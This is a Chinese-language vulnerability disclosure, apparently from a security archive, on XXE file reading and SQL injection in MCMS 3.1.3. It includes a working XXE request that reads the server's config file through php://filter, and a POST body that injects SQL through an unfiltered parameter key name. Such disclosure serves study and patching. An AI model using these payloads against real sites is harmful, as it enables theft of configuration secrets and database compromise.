|MCMS 3.1.3 最新版sql注入与任意文件读取 - VULHUB开源网络安全威胁库

MCMS 3.1.3 最新版sql注入与任意文件读取

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： rt ### 详细说明：先看看任意文件读取。上次提交的这个 [WooYun: mcms v3.1.0 sql注入+任意文件读取。](http://www.wooyun.org/bugs/wooyun-2015-090986) 厂商的做法是 ``` $wx=new weixin(); $_GET = H::sqlxss($_GET); $_POST = H::sqlxss($_POST); ........... function response_msg(){ global $dbm,$C; $postStr = $GLOBALS["HTTP_RAW_POST_DATA"]; if(!empty($postStr)){ $postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA); $fromUsername = $postObj->FromUserName; $toUsername = $postObj->ToUserName; ... $keyword = trim($postObj->Content); $keyword = H::sqlxss($keyword); ``` $_GET = H::sqlxss($_GET); $_POST = H::sqlxss($_POST); $keyword = H::sqlxss($keyword);加了这么几句。注入是不行了。但是依然可以任意文件读取啊~ post: ``` POST //app/weixin/notify.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=9vl7m4ivoovc76am47nrnr3m81; CNZZDATA1253530733=784223860-1426700537-%7C1426700537; skip_url=mycenter.php X-Forwarded-For: 8.8.8.8 Connection: keep-alive Content-Type: text/xml Content-Length: 262 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE copyright [ <!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=file:///D:/Wamp/www/config/global.php"> ]> <xml> <ToUserName>&test;</ToUserName> <Content>a\</Content> </xml> ``` [<img src="https://images.seebug.org/upload/201503/190243227e2c76e8065c15d6f658b8dcc0009141.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/190243227e2c76e8065c15d6f658b8dcc0009141.png) [<img src="https://images.seebug.org/upload/201503/19024329bff27c37615ebc73e574eccc0f332ee9.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/19024329bff27c37615ebc73e574eccc0f332ee9.png) 再来看看注入。 D:/wamp/www/app/user/info.php ``` function m__save(){ global $dbm,$C,$V; $_POST['info_body']=strip_tags($_POST['info_body'], ' <p><a><img>'); $_POST=H::sqlxss($_POST); //处理附件参数 $attach= $oname = $order = $model_fields = array(); foreach($_POST as $k=>$v){ if(substr($k,0,9)=='attach___'){ $attach[$v]=$v; $oname[$v]=($_POST['oname___'.$v]==''?'':$_POST['oname___'.$v]); $order[$v]=($_POST['order___'.$v]==''?'':$_POST['order___'.$v]); } if (substr($k,0,9)=='extern___') { // 填充扩展表字段 $model_fields[substr($k,9)] = $v; } } ...... if($fields['model_name']!=''){ $model_fields['info_id']=$info_id; //预先处理某些值比如日期 foreach($model_fields as $k=>$v) { $sql = "select form_type from ".TB_PRE."model_fields where model_name='".$fields['model_name']."' and field_name='".$k."' limit 1"; ``` 由于对于键名木有过滤，导致注入的产生， post: ``` info_id=1&cate_id=2&model_name=product&info_title=aaaaaa&info_img=&info_body=11&extern___test 'sql语句=1 ``` [<img src="https://images.seebug.org/upload/201503/19025030d6bdb397b69059caf1a4886212964be1.png" alt="11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/19025030d6bdb397b69059caf1a4886212964be1.png) 可以看到单引号进来了。可延时盲注- - ### 漏洞证明： [<img src="https://images.seebug.org/upload/201503/19025030d6bdb397b69059caf1a4886212964be1.png" alt="11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/19025030d6bdb397b69059caf1a4886212964be1.png) [<img src="https://images.seebug.org/upload/201503/190243227e2c76e8065c15d6f658b8dcc0009141.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/190243227e2c76e8065c15d6f658b8dcc0009141.png)

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™